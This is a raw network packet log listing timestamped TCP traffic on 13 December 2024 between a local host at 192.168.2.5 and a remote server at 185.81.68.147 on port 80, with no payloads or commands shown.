                                                                                                                                                                Dec 13, 2024 01:37:10.728343964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.729033947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.729165077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.729253054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.729945898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.730153084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.730247974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.730859995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.731050968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.731141090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.731789112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.731899023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.731992006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.732631922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.785981894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.877125025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.877145052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.877245903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.877443075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.877533913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.877605915 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.878262043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.878376961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.878458977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.879173040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.879297018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.879368067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.880074024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.880201101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.880275965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.880995989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.881117105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.881186962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.881932020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.882025957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.882095098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.882790089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.882898092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.882967949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.883724928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.883822918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.883893013 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.884634972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.884752989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.884823084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.885560989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.885663986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.885731936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.886445045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.886555910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.886624098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.887387037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.887516022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.887586117 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.888274908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.888395071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.888459921 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.889167070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.889271975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.889338970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.890084982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.890209913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.890273094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.891012907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.891127110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.891202927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.891908884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.892040014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.892107964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.892842054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.892951965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.893017054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.893727064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.893852949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.893922091 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.894668102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.894782066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.894849062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.895540953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.895663023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.895733118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.896436930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.896569967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.896635056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.897356033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.897485971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.897552967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.898269892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.898403883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.898478031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.899193048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.899300098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.899365902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.900104046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.900230885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.900300026 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.900990963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.901143074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.901211023 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.901905060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.902031898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.902096987 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.902828932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.902951002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.903019905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.903754950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.903886080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.903959990 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.904644966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.904753923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.904819965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.905550003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.905642033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.905709028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.906455040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.906569004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.906641960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.907383919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.907490969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.907560110 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.908301115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.908413887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.908494949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.909177065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.909293890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.909359932 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.910093069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.910211086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.910274982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.911007881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.911118031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.911186934 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.911933899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.912050962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.912122965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.912821054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.912942886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.913006067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.913748026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.913883924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.913949966 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.914673090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.914781094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.914846897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.915560961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.915744066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.915812016 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.916476011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.916655064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.916723967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.917375088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.917511940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.917577982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.918281078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.918401003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.918467999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.919204950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.919328928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.919393063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.920111895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.920293093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.920357943 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.921149015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.921216011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.921292067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.921921968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.922055006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.922120094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.922831059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.922934055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.922998905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.923744917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.923809052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.923875093 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.924612999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.973407984 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.068856955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.068909883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.069005013 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.069302082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.069361925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.069453001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.070219040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.070319891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.070408106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.071113110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.071290016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.071377039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.072029114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.072133064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.072220087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.072916985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.073054075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.073133945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.073857069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.074048996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.074131012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.074759007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.074879885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.074959993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.075663090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.075793028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.075874090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.076560020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.076673031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.076756954 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.077480078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.077603102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.077682972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.078391075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.078470945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.078547001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.079291105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.079416037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.079494953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.080204964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.080312014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.080391884 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.081109047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.081265926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.081345081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.082025051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.082128048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.082214117 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.082925081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.083031893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.083112955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.083832979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.083940029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.084022999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.084749937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.084866047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.084944010 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.085669041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.085817099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.085896015 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.086563110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.086946011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.087023020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.087470055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.087574959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.087661028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.088390112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.088502884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.088577986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.089303970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.089411974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.089499950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.090203047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.090307951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.090387106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.091154099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.091253996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.091334105 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.092091084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.092185020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.092264891 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.092943907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.093081951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.093159914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.093854904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.094002008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.094072104 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.094755888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.094855070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.094938993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.095671892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.095767975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.095848083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.096570969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.096698999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.096781015 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.097485065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.097630978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.097708941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.098380089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.098531961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.098609924 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.099291086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.099406958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.099486113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.100225925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.100320101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.100402117 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.101133108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.101246119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.101329088 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.102050066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.102133989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.102219105 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.102931023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.103041887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.103121996 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.103852987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.103939056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.104012012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.104749918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.104862928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.104949951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.105655909 CET8049707185.81.68.147192.168.2.5
